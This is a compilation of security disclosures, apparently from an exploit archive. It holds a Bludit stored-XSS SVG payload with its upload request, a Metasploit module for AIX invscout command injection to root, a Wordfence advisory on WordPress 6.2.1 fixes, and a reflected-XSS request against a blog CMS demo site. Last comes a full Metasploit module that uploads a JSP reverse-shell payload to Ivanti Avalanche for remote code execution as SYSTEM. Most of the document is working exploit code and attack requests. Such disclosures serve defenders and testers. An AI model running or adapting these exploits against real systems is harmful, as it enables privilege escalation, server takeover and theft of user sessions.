<pre><code># Exploit Title: Bludit CMS v3.14.1 - Stored Cross-Site Scripting (XSS)<br />(Authenticated)<br /># Date: 2023-04-15<br /># Exploit Author: Rahad Chowdhury<br /># Vendor Homepage: https://www.bludit.com/<br /># Software Link: https://github.com/bludit/bludit/releases/tag/3.14.1<br /># Version: 3.14.1<br /># Tested on: Windows 10, PHP 7.4.29, Apache 2.4.53<br /># CVE: CVE-2023-31698<br /><br />SVG Payload<br />-------------<br /><?xml version="1.0" standalone="no"?><br /><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "<br />http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><br /><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"><br /><polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400<br />"/><br /><script type="text/javascript"><br />alert(document.domain);<br /></script><br /></svg><br /><br />save this SVG file xss.svg<br /><br />Steps to Reproduce:<br /><br />1. At first login your admin panel.<br />2. then go to setting and click logo section.<br />3. Now upload xss.svg file so your request data will be<br /><br />POST /bludit/admin/ajax/logo-upload HTTP/1.1<br />Host: 127.0.0.1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)<br />Gecko/20100101 Firefox/112.0<br />Content-Type: multipart/form-data;<br />boundary=---------------------------15560729415644048492005010998<br />Referer: http://127.0.0.1/bludit/admin/settings<br />Cookie: BLUDITREMEMBERUSERNAME=admin;<br />BLUDITREMEMBERTOKEN=139167a80807781336bc7484552bc985;<br />BLUDIT-KEY=tmap19d0m813e8rqfft8rsl74i<br />Content-Length: 651<br /><br />-----------------------------15560729415644048492005010998<br />Content-Disposition: form-data; name="tokenCSRF"<br /><br />626c201693546f472cdfc11bed0938aab8c6e480<br />-----------------------------15560729415644048492005010998<br />Content-Disposition: form-data; name="inputFile"; filename="xss.svg"<br />Content-Type: image/svg+xml<br /><br /><?xml version="1.0" standalone="no"?><br /><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "<br />http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><br /><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"><br /><polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400<br />"/><br /><script type="text/javascript"><br />alert(document.domain);<br /></script><br /></svg><br /><br />-----------------------------15560729415644048492005010998--<br /><br />4. Now open logo image link that you upload. You will see XSS pop up.<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Local<br /> Rank = ExcellentRanking<br /><br /> include Msf::Post::File<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'invscout RPM Privilege Escalation',<br /> 'Description' => %q{<br /> This module exploits a command injection vulnerability in IBM AIX<br /> invscout set-uid root utility present in AIX 7.2 and earlier.<br /><br /> The undocumented -rpm argument can be used to install an RPM file;<br /> and the undocumented -o argument passes arguments to the rpm utility<br /> without validation, leading to command injection with effective-uid<br /> root privileges.<br /><br /> This module has been tested successfully on AIX 7.2.<br /> },<br /> 'Author' => [<br /> 'Tim Brown', # Discovery and PoC<br /> 'bcoles' # Metasploit<br /> ],<br /> 'References' => [<br /> ['CVE', '2023-28528'],<br /> ['URL', 'https://talosintelligence.com/vulnerability_reports/TALOS-2023-1691'],<br /> ],<br /> 'Platform' => %w[unix aix],<br /> 'Arch' => ARCH_CMD,<br /> 'Payload' => {<br /> 'BadChars' => "\x00\x0a\x0d\x22",<br /> 'Compat' => {<br /> 'PayloadType' => 'cmd',<br /> 'RequiredCmd' => 'generic telnet openssl'<br /> }<br /> },<br /> 'DefaultOptions' => {<br /> 'PrependSetresuid' => true,<br /> 'PrependSetresgid' => true,<br /> 'PrependFork' => true<br /> },<br /> 'SessionTypes' => %w[shell meterpreter],<br /> 'Targets' => [['Automatic', {}]],<br /> 'DefaultTarget' => 0,<br /> 'DisclosureDate' => '2023-04-24',<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS]<br /> }<br /> )<br /> )<br /><br /> register_options([<br /> OptString.new('INVSCOUT_PATH', [true, 'Path to invscout executable', '/usr/sbin/invscout'])<br /> ])<br /> end<br /><br /> def invscout_path<br /> datastore['INVSCOUT_PATH']<br /> end<br /><br /> def check<br /> return CheckCode::Safe("#{invscout_path} is not executable") unless executable?(invscout_path)<br /><br /> res = execute_command('id')<br /> id = res.to_s.scan(/^(.*?uid=.*?)$/).flatten.first.to_s<br /><br /> return CheckCode::Safe("#{invscout_path} is not vulnerable.") unless id.include?('euid=0')<br /><br /> CheckCode::Vulnerable("Output: #{id}")<br /> end<br /><br /> def execute_command(cmd, _opts = {})<br /> rpm_path = "#{Rex::Text.rand_text_alphanumeric(8..12)}.rpm"<br /> rpm_args = "; #{cmd}; echo "<br /> res = cmd_exec("#{invscout_path} -RPM #{rpm_path} -o \"#{rpm_args}\"")<br /> vprint_line(res) unless res.blank?<br /> res<br /> end<br /><br /> def exploit<br /> execute_command(payload.encoded)<br /> end<br />end<br /></code></pre>
<pre><code>On May 16, 2023, the WordPress core team released WordPress 6.2.1, which contains patches for 5 vulnerabilities, including a Medium Severity Directory Traversal vulnerability, a Medium-Severity Cross-Site Scripting vulnerability, and several lower-severity vulnerabilities.<br /><br />These patches have been backported to every version of WordPress since 4.1. WordPress has supported automatic core updates for security releases since WordPress 3.7, and the vast majority of WordPress sites should receive a patch for their major version of WordPress automatically over the next 24 hours. We recommend verifying that your site has been automatically updated to one of the patched versions. Patched versions are available for every major version of WordPress since 4.1, so you can update without risking compatibility issues.<br /><br />If your site has not been updated automatically we strongly recommend updating manually as soon as possible, as one of the vulnerabilities patched in this release can be used by an attacker with a low-privileged contributor-level account to take over a site.<br /><br />This email content has also been published on our blog and you're welcome to post a comment there if you'd like to join the conversation. Or you can read the full post in this email.<br /><br />Vulnerability Analysis<br /><br />As with every WordPress core release containing security fixes, the Wordfence Threat Intelligence team analyzed the code changes in detail to evaluate the impact of these vulnerabilities on our customers, and to ensure our customers remain protected.<br /><br />Description: WordPress Core <= 6.2 - Directory Traversal via wp_lang <br /><br />Affected Versions: WordPress Core < 6.2.1<br /><br />Researcher: Matt Rusnak, reported by Ramuel Gall as well as an undisclosed third party auditor<br /><br />CVE ID: CVE-2023-2745 <br /><br />CVSS Score: 5.4 (Medium)<br /><br />CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N<br /><br />Fully Patched Version: 6.2.1<br /><br />WordPress Core is vulnerable to Directory Traversal in versions up to, and including, 6.2, via the ‘wp_lang’ parameter. This allows unauthenticated attackers to access and load arbitrary translation files. In cases where an attacker is able to upload a crafted translation file onto the site, such as via an upload form, this could be also used to perform a Cross-Site Scripting attack. This vulnerability would not be easy to exploit in an impactful manner on most configurations.<br /><br />Description: WordPress Core <= 6.2 - Cross-Site Request Forgery via wp_ajax_set_attachment_thumbnail <br /><br />Affected Versions: WordPress Core < 6.2.1<br /><br />Researcher: John Blackbourn of the WordPress security team<br /><br />CVE ID: Pending<br /><br />CVSS Score: 4.3 (Medium)<br /><br />CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N<br /><br />Fully Patched Version: 6.2.1<br /><br />WordPress Core is vulnerable to Cross-Site Request Forgery due to missing nonce validation on the ‘wp_ajax_set_attachment_thumbnail’ AJAX function in versions up to, and including, 6.2. This allows unauthenticated users to update the thumbnail image associated with existing attachments, granted they can trick an authenticated user with appropriate permissions into performing an action, such as clicking a link. The impact of this vulnerability is incredibly minimal and we do not expect to see any exploitation of this weakness.<br /><br />Description: WordPress Core <= 6.2 - Authenticated (Contributor+) Stored Cross-Site Scripting via Embed Discovery Functionality <br /><br />Affected Versions: WordPress Core < 6.2.1<br /><br />Researcher: Jakub Żoczek of Securitum and undisclosed third-party auditor<br /><br />CVE ID: Pending<br /><br />CVSS Score: 6.4 (Medium)<br /><br />CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N<br /><br />Fully Patched Version: 6.2.1<br /><br />WordPress Core is vulnerable to stored Cross-Site Scripting in versions up to, and including, 6.2, due to insufficient validation of the protocol in the response when processing oEmbed discovery. This makes it possible for authenticated attackers with contributor-level and above permissions to use a crafted oEmbed payload at a remote URL to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.<br /><br />Description: WordPress Core <= 6.2 - Insufficient Sanitization of Block Attributes <br /><br />Affected Versions: WordPress Core < 6.2.1<br /><br />Researcher: Undisclosed third-party auditor<br /><br />CVE ID: Pending<br /><br />CVSS Score: 6.4 (Medium)<br /><br />CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N<br /><br />Fully Patched Version: 6.2.1<br /><br />WordPress Core fails to sufficiently sanitize block attributes in versions up to, and including, 6.2. This makes it possible for authenticated attackers with contributor-level and above permissions to embed arbitrary content in HTML comments on the page, though Cross-Site scripting may be possible when combined with an additional vulnerability. Please note that this would only affect sites utilizing a block editor compatible theme.<br /><br />Description: WordPress Core <= 6.2 - Shortcode Execution in User Generated Content <br /><br />Affected Versions: WordPress Core < 6.2.1<br /><br />Researcher: Liam Gladdy of WP Engine<br /><br />CVE ID: Pending<br /><br />CVSS Score: 6.5 (Medium)<br /><br />CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N<br /><br />Fully Patched Version: 6.2.1<br /><br />WordPress Core processes shortcodes in user-generated content on block themes in versions up to, and including, 6.2. This could allow unauthenticated attackers to execute shortcodes via submitting comments or other content, allowing them to exploit vulnerabilities that typically require Subscriber or Contributor-level permissions. While this is likely to have minimal impact on its own, it can significantly increase the severity and exploitability of other vulnerabilities.<br /><br />Conclusion<br /><br />In today’s article, we covered five vulnerabilities patched in the WordPress 6.2.1 Security and Maintenance Release. Most actively used WordPress sites should be patched via automatic updates within the next 24 hours.<br /><br />The Wordfence firewall’s built-in directory traversal protection should block attempts to exploit the directory traversal vulnerability, and it would typically only be impactful when exploited by a skilled attacker in certain configurations. Most of the other issues fixed today are similar in that they require specific configurations or circumstances, such as other vulnerable plugins, to impactfully exploit.<br /><br />However, we urge all site owners to verify that WordPress is updated as soon as possible since it is not practical to deploy a firewall rule that protects against the oEmbed issue and as such any site with untrusted contributor-level users may be at risk.<br /><br />As always, we strongly recommend updating your site to a patched version of WordPress if it hasn’t been updated automatically. As long as you are running a version of WordPress greater than 4.1, an update is available to patch these vulnerabilities while keeping you on the same major version, so you will not need to worry about compatibility issues.<br /><br />Special thanks to Wordfence QA Lead Matt Rusnak for finding the directory traversal vulnerability that we responsibly disclosed, and to John Blackbourn of the WordPress security team, Jakub Żoczek of Securitum, and Liam Gladdy of WP Engine for responsibly disclosing these issues.<br /><br /></code></pre>
<pre><code>## Title: SEO-friendly-blog-CMS-system-in-PHP-with-MYSQL-database-1.0-2023<br />XSS-Reflected Vulnerability<br />## Author: nu11secur1ty<br />## Date: 05.17.2023<br />## Vendor: https://technosmarter.com/<br />## Software: https://github.com/technosmarter/SEO-friendly-blog-CMS-system-in-PHP-with-MYSQL-database<br />## Reference XSS: https://portswigger.net/web-security/cross-site-scripting<br /><br /><br />## Description:<br />The value of the keywords request parameter is copied into the HTML<br />document as text between TITLE tags.<br />The payload wi46u</title><script>alert(1)</script>fssgc was submitted<br />in the keywords parameter. This input was echoed unmodified in the<br />application's response.<br />Conclusion: The `search` parameter is vulnerable for XSS-Reflected<br />with Js injection.<br />The malicious user can craft a very malicious URL and after this he<br />can sending it<br />to a very large group of people. This is very dangerous vulnerability.<br /><br /><br /><br />STATUS: CRITICAL Vulnerability<br /><br />[+]Exploit-XSS-test:<br />```XSS<br />POST /blog/search/%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/2<br />Host: demo.technosmarter.com<br />Cookie: PHPSESSID=c116aa1138f1c4a490514e8bad58eef4<br />Content-Length: 73<br />Cache-Control: max-age=0<br />Sec-Ch-Ua: "Chromium";v="113", "Not-A.Brand";v="24"<br />Sec-Ch-Ua-Mobile: ?0<br />Sec-Ch-Ua-Platform: "Windows"<br />Upgrade-Insecure-Requests: 1<br />Origin: https://demo.technosmarter.com<br />Content-Type: application/x-www-form-urlencoded<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)<br />AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93<br />Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Referer: https://demo.technosmarter.com/blog/search/%3Cscript%3Ealert(document.cookie)%3C/script%3E<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br /><br />keywords=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&subsearch=<br />```<br />[+]Response:<br />```HTTP<br />HTTP/2 302 Found<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Cache-Control: no-cache, no-store, must-revalidate, max-age=0<br />Pragma: no-cache<br />Location: https://demo.technosmarter.com/blog/search/<script>alert(document.cookie)</script><br />Content-Type: text/html; charset=UTF-8<br />Content-Length: 18035<br />Vary: Accept-Encoding<br />Date: Wed, 17 May 2023 10:42:45 GMT<br />Server: LiteSpeed<br />Strict-Transport-Security: max-age=31536000; includeSubDomains; preload<br />X-Xss-Protection: 1; mode=block<br />X-Content-Type-Options: nosniff<br />Alt-Svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000,<br />h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000,<br />h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"<br />```<br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/technosmarter/2023/SEO-friendly-blog-CMS-system-in-PHP-with-MYSQL-database-1.0-2023)<br /><br />## Proof and Exploit:<br />[href](https://www.nu11secur1ty.com/2023/05/seo-friendly-blog-cms-10-2023-xss.html)<br /><br />## Time spend:<br />00:37:00<br /><br /><br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::FileDropper<br /> prepend Msf::Exploit::Remote::AutoCheck<br /> include Msf::Exploit::Remote::HttpClient<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Ivanti Avalanche FileStoreConfig File Upload',<br /> 'Description' => %q{<br /> Ivanti Avalanche prior to v6.4.0.186 permits MS-DOS style short<br /> names in the configuration path for the Central FileStore. Because of<br /> this, an administrator can change the default path to the web root<br /> of the applications, upload a JSP file, and achieve RCE as NT AUTHORITY\SYSTEM.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'Piotr Bazydlo', # @chudypb - Vulnerability Discovery<br /> 'Shelby Pace' # Metasploit module<br /> ],<br /> 'References' => [<br /> ['URL', 'https://www.zerodayinitiative.com/advisories/ZDI-23-456/'],<br /> ['URL', 'https://forums.ivanti.com/s/article/ZDI-CAN-17812-Ivanti-Avalanche-FileStoreConfig-Arbitrary-File-Upload-Remote-Code-Execution-Vulnerability?language=en_US'],<br /> ['URL', 'https://attackerkb.com/topics/jcdcN9SN9V/cve-2023-28128'],<br /> ['CVE', '2023-28128']<br /> ],<br /> 'Platform' => ['win', 'java'],<br /> 'Privileged' => true,<br /> 'Arch' => ARCH_JAVA,<br /> 'Targets' => [<br /> [ 'Automatic Target', { 'DefaultOptions' => { 'Payload' => 'java/jsp_shell_reverse_tcp' } }]<br /> ],<br /> 'DisclosureDate' => '2023-04-24',<br /> 'DefaultTarget' => 0,<br /> 'Notes' => {<br /> 'Stability' => [ CRASH_SAFE ],<br /> 'Reliability' => [ REPEATABLE_SESSION ],<br /> 'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK ]<br /> }<br /> )<br /> )<br /><br /> register_options(<br /> [<br /> Opt::RPORT(8080),<br /> OptString.new('USERNAME', [ true, 'User name to log in with', 'amcadmin' ]),<br /> OptString.new('PASSWORD', [ true, 'Password to log in with', 'admin' ]),<br /> OptString.new('TARGETURI', [ true, 'The URI of the Example Application', '/AvalancheWeb' ])<br /> ]<br /> )<br /> end<br /><br /> def check<br /> # Cleanup should not be needed after doing just a check.<br /> @cleanup_needed = false<br /><br /> res = send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path, 'login.jsf'),<br /> 'method' => 'GET'<br /> )<br /><br /> return CheckCode::Unknown('Failed to receive a response from the application') unless res<br /><br /> unless res.body.include?('Avalanche - User Login')<br /> return CheckCode::Safe('Application does not appear to be Ivanti Avalanche')<br /> end<br /><br /> html = res.get_html_document<br /> elem = html.search('link')&.find { |link| link&.at('@href')&.text&.match(/\d+\.\d+\.\d+\.\d{1,4}/) }<br /> return CheckCode::Detected('Couldn\'t retrieve element containing Avalanche version') unless elem<br /><br /> version = elem&.at('@href')&.value&.match(/(\d+\.\d+\.\d+\.\d{1,4})/)<br /> return CheckCode::Detected('Failed to retrieve software version') unless version && version.length >= 2<br /><br /> version = version[1]<br /> vprint_status("Version of Ivanti Avalanche appears to be v#{version}")<br /> ver_no = Rex::Version.new(version)<br /> patched_version = Rex::Version.new('6.4.0.186')<br /><br /> if ver_no >= patched_version<br /> CheckCode::Safe('Target has been patched!')<br /> elsif ver_no < patched_version<br /> CheckCode::Appears('Target appears to be running an unpatched version of Ivanti Avalanche!')<br /> else<br /> CheckCode::Unknown("This should never be hit! Some error occurred when grabbing the target version: #{ver_no}")<br /> end<br /> end<br /><br /> def authenticate<br /> if datastore['USERNAME'].blank? && datastore['PASSWORD'].blank?<br /> fail_with(Failure::BadConfig, 'Please set the USERNAME and PASSWORD options')<br /> end<br /><br /> res = send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path, 'login.jsf'),<br /> 'method' => 'GET',<br /> 'keep_cookies' => true<br /> )<br /><br /> fail_with(Failure::UnexpectedReply, 'Failed to access login page') unless res&.body&.include?('Avalanche - User Login')<br /><br /> html = res.get_html_document<br /> view_state = get_view_state(html)<br /> fail_with(Failure::UnexpectedReply, 'Failed to retrieve view state after browsing to the login page.') unless view_state<br /><br /> res = send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path, 'login.jsf'),<br /> 'method' => 'POST',<br /> 'keep_cookies' => true,<br /> 'vars_post' => {<br /> 'loginForm' => 'loginForm',<br /> 'j_idt8' => '',<br /> 'loginField' => datastore['USERNAME'],<br /> 'passwordField' => datastore['PASSWORD'],<br /> 'TextCaptchaAnswer' => '',<br /> 'javax.faces.ViewState' => view_state,<br /> 'loginTableButton' => 'loginTableButton'<br /> }<br /> )<br /><br /> unless res&.code == 302 && res&.headers&.dig('Location')&.include?('inventory.jsf')<br /> fail_with(Failure::UnexpectedReply, 'Login failed')<br /> end<br /> end<br /><br /> def get_view_state(html)<br /> view_state = html.xpath("//input[@name='javax.faces.ViewState']")&.first&.at('@value')&.text<br /><br /> view_state<br /> end<br /><br /> def configure_filestore<br /> res = send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path, 'app', 'FileStoreConfig.jsf'),<br /> 'method' => 'GET',<br /> 'keep_cookies' => true<br /> )<br /><br /> unless res&.get_html_document&.xpath('//form[@id="form_filestore_tree"]')&.first<br /> fail_with(Failure::UnexpectedReply, 'Failed to access FileStore configuration')<br /> end<br /><br /> html = res.get_html_document<br /> view_state = get_view_state(html)<br /> fail_with(Failure::UnexpectedReply, 'Failed to retrieve view state from FileStoreConfig page') unless view_state<br /><br /> @original_config_path = html.xpath("//input[@id='txtUncPath']")&.first&.at('@value')&.text<br /> fail_with(Failure::UnexpectedReply, 'Unable to grab FileStore path') unless @original_config_path<br /> print_status("Original FileStore config path: '#{@original_config_path}'")<br /><br /> # determine drive letter<br /> drive_letter = @original_config_path.match(/([a-zA-Z])(:|\$)/)<br /> fail_with(Failure::UnexpectedReply, 'Couldn\'t determine drive letter for path') unless drive_letter&.length&.>= 3<br /> drive_letter = drive_letter[1]<br /><br /> new_config_path = "#{drive_letter}:\\PROGRA~1\\Wavelink\\AVALAN~1\\Web"<br /> print_status("Changing FileStore config path to '#{new_config_path}'")<br /> res = send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path, 'app', 'FileStoreConfig.jsf'),<br /> 'method' => 'POST',<br /> 'keep_cookies' => true,<br /> 'vars_post' => {<br /> 'linkFileStoreConfigSave' => 'linkFileStoreConfigSave',<br /> 'formFileStoreConfig' => 'formFileStoreConfig',<br /> 'txtUncPath' => new_config_path,<br /> 'txtVelocityFolder' => '',<br /> 'javax.faces.ViewState' => view_state<br /> }<br /> )<br /><br /> input_field_html = res&.get_html_document&.xpath('//input[@id="txtUncPath"]')&.first<br /> if input_field_html.blank?<br /> fail_with(Failure::UnexpectedReply, 'Did not receive a response containing the expected txtUncPath input field!')<br /> elsif input_field_html[:value] != new_config_path<br /> fail_with(Failure::UnexpectedReply, 'Failed to change FileStore config path')<br /> end<br /> end<br /><br /> def get_directory_val(res, dir_name)<br /> html = res.get_html_document<br /> results = html.xpath('//tr[contains(@class, "DIRECTORY")]')<br /> fail_with(Failure::UnexpectedReply, 'Failed to find list of expected directories') unless results<br /><br /> expand_dir = results.find { |result| result.at('td')&.text&.strip == dir_name }<br /> fail_with(Failure::UnexpectedReply, "Failed to find the '#{dir_name}' directory to write to") unless expand_dir<br /> data_rk = expand_dir.at('@data-rk')&.value<br /> fail_with(Failure::UnexpectedReply, "Failed to get value to expand #{dir_name} directory") unless data_rk<br /><br /> data_rk<br /> end<br /><br /> def expand_folder(data_rk, view_state)<br /> send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path, 'app', 'FileStoreConfig.jsf'),<br /> 'method' => 'POST',<br /> 'keep_cookies' => true,<br /> 'vars_post' => {<br /> 'javax.faces.source' => 'fileStoreTree_dlgFileStoreTree',<br /> 'javax.faces.partial.execute' => 'fileStoreTree_dlgFileStoreTree',<br /> 'fileStoreTree_dlgFileStoreTree' => 'fileStoreTree_dlgFileStoreTree',<br /> 'fileStoreTree_dlgFileStoreTree_expand' => data_rk,<br /> 'javax.faces.ViewState' => view_state<br /> }<br /> )<br /> end<br /><br /> def select_folder(data_rk, view_state)<br /> @cleanup_needed = true<br /> send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path, 'app', 'FileStoreConfig.jsf'),<br /> 'method' => 'POST',<br /> 'keep_cookies' => true,<br /> 'vars_post' =><br /> {<br /> 'javax.faces.source' => 'fileStoreTree_dlgFileStoreTree',<br /> 'javax.faces.partial.execute' => 'fileStoreTree_dlgFileStoreTree',<br /> 'javax.faces.behavior.event' => 'select',<br /> 'javax.faces.partial.event' => 'select',<br /> 'fileStoreTree_dlgFileStoreTree_instantSelection' => data_rk,<br /> 'form_filestore_tree' => 'form_filestore_tree',<br /> 'fileStoreTree_dlgFileStoreTree_selection' => data_rk,<br /> 'javax.faces.ViewState' => view_state<br /> }<br /> )<br /> end<br /><br /> def upload_payload<br /> payload_name = "#{Rex::Text.rand_text_alpha(5..12)}.jsp"<br /> # need to 'select' webapps/AvalancheWeb to upload a file<br /> res = send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path, 'app', 'FileStoreConfig.jsf'),<br /> 'method' => 'GET',<br /> 'keep_cookies' => true<br /> )<br /><br /> fail_with(Failure::UnexpectedReply, 'Failed to access updated FileStore page') unless res&.get_html_document&.xpath('//form[@id="form_filestore_tree"]')&.first<br /> web_data_rk = get_directory_val(res, 'webapps')<br /> view_state = get_view_state(res.get_html_document)<br /> fail_with(Failure::UnexpectedReply, 'Failed to retrieve view state after accessing the updated FileStore page') unless view_state<br /><br /> res = expand_folder(web_data_rk, view_state)<br /> fail_with(Failure::UnexpectedReply, 'Did not receive response from \'webapps\' expansion') unless res<br /> avalanche_data_rk = get_directory_val(res, 'AvalancheWeb')<br /> view_state = get_view_state(res.get_html_document)<br /> fail_with(Failure::UnexpectedReply, 'Failed to retrieve view state after getting the directory value for AvalancheWeb') unless view_state<br /> res = select_folder(avalanche_data_rk, view_state)<br /> fail_with(Failure::UnexpectedReply, 'Did not receive response from \'AvalancheWeb\' selection') unless res<br /><br /> view_state = get_view_state(res.get_html_document)<br /> fail_with(Failure::UnexpectedReply, 'Failed to retrieve view state after selecting the AvalancheWeb folder') unless view_state<br /><br /> boundary = "#{'-' * 4}WebKitFormBoundary#{Rex::Text.rand_text_alphanumeric(16)}"<br /><br /> post_data = "--#{boundary}\r\n"<br /> post_data << "Content-Disposition: form-data; name=\"upload-form\"\r\n\r\n"<br /> post_data << "upload-form\r\n"<br /> post_data << "--#{boundary}\r\n"<br /> post_data << "Content-Disposition: form-data; name=\"javax.faces.ViewState\"\r\n\r\n"<br /> post_data << "#{view_state}\r\n"<br /> post_data << "--#{boundary}\r\n"<br /> post_data << "Content-Disposition: form-data; name=\"javax.faces.partial.ajax\r\n\r\n"<br /> post_data << "true\r\n"<br /> post_data << "--#{boundary}\r\n"<br /> post_data << "Content-Disposition: form-data; name=\"javax.faces.partial.execute\"\r\n\r\n"<br /> post_data << "importFileStoreItemPanel_dlgFileStoreTree\r\n"<br /> post_data << "--#{boundary}\r\n"<br /> post_data << "Content-Disposition: form-data; name=\"javax.faces.source\"\r\n\r\n"<br /> post_data << "importFileStoreItemPanel_dlgFileStoreTree\r\n"<br /> post_data << "--#{boundary}\r\n"<br /> post_data << "Content-Disposition: form-data; name=\"javax.faces.partial.render\"\r\n\r\n"<br /> post_data << "fileStoreTree_dlgFileStoreTree managementBtns addFolderDialog_dlgFileStoreTree renameItemDialog_dlgFileStoreTree confirmDeleteItemDialog_dlgFileStoreTree importMessages\r\n"<br /> post_data << "--#{boundary}\r\n"<br /> post_data << "Content-Disposition: form-data; name=\"importFileStoreItemPanel_dlgFileStoreTree\"; filename=\"#{payload_name}\"\r\n"<br /> post_data << "Content-Type: application/octet-stream\r\n\r\n"<br /> post_data << "#{payload.encoded}\r\n"<br /> post_data << "--#{boundary}--\r\n"<br /><br /> res = send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path, 'app', 'FileStoreConfig.jsf'),<br /> 'method' => 'POST',<br /> 'keep_cookies' => true,<br /> 'data' => post_data,<br /> 'headers' => {<br /> 'Accept' => 'application/xml, text/xml, */*; q=0.01',<br /> 'Faces-Request' => 'partial/ajax',<br /> 'X-RequestedWith' => 'XMLHttpRequest',<br /> 'Content-Type' => "multipart/form-data; boundary=#{boundary}",<br /> 'Accept-Encoding' => 'gzip, deflate'<br /> }<br /> )<br /><br /> fail_with(Failure::UnexpectedReply, 'Failed to upload payload') unless res&.body&.include?("Imported file #{payload_name}")<br /><br /> print_good("Successfully uploaded '#{payload_name}'")<br /> payload_name<br /> end<br /><br /> def cleanup<br /> if @cleanup_needed == false<br /> return<br /> end<br /><br /> restore_msg = 'Please manually restore FileStore config via Tools -> Central FileStore -> Configurations.'<br /> print_status('Attempting to restore config path')<br /> res = send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path, 'app', 'FileStoreConfig.jsf'),<br /> 'method' => 'GET',<br /> 'keep_cookies' => true<br /> )<br /><br /> unless res<br /> print_error("Could not access FileStore config. #{restore_msg}")<br /> return<br /> end<br /><br /> html = res.get_html_document<br /> view_state = get_view_state(html)<br /> unless view_state<br /> print_error("Failed to get view state. #{restore_msg}")<br /> return<br /> end<br /><br /> send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path, 'app', 'FileStoreConfig.jsf'),<br /> 'method' => 'POST',<br /> 'keep_cookies' => true,<br /> 'vars_post' => {<br /> 'linkFileStoreConfigSave' => 'linkFileStoreConfigSave',<br /> 'formFileStoreConfig' => 'formFileStoreConfig',<br /> 'txtUncPath' => @original_config_path,<br /> 'txtVelocityFolder' => '',<br /> 'javax.faces.ViewState' => view_state<br /> }<br /> )<br /><br /> res = send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path, 'app', 'FileStoreConfig.jsf'),<br /> 'method' => 'GET',<br /> 'keep_cookies' => true<br /> )<br /><br /> unless res&.body&.include?(@original_config_path)<br /> print_warning("Failed to restore the FileStore config path to its original path. #{restore_msg}")<br /> return<br /> end<br /><br /> print_good('Successfully restored the FileStore config path')<br /> end<br /><br /> def exploit<br /> # Starting off we shouldn't need cleanup, however if we get to the point were we start<br /> # to change config settings then we will need to clean that up.<br /> @cleanup_needed = false<br /><br /> authenticate<br /> configure_filestore<br /> payload_name = upload_payload<br /><br /> register_file_for_cleanup("webapps/#{payload_name}")<br /> send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path, payload_name.gsub('jsp', 'jsf')), # bypasses the app's filter, but is still resolved by java faces servlet<br /> 'method' => 'GET',<br /> 'keep_cookies' => true<br /> )<br /> end<br />end<br /></code></pre>
